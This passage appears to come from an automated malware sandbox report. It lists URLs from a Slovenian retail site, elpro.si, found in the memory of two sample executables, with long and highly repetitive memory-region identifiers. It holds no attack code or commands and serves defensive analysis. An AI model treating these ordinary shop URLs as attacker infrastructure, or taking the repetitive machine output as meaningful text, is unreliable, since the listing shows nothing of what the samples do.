00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/dodatni-izdelki-in-dodatki-za-tempe
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/pretvorniki-temperature/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/temperaturna-stikala-wika/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/dodatni-izdelki-in-dodatki-za-tlak/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/manometri-wika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/tlacna-stikala-wika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tok/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kontakt/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/moj-racun/lost-password/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/nautiz-x6-na-dirkaliscu/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/splosni-prodajni-pogoji/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/piskotki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpo
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpora/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/analiza-plinov/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, 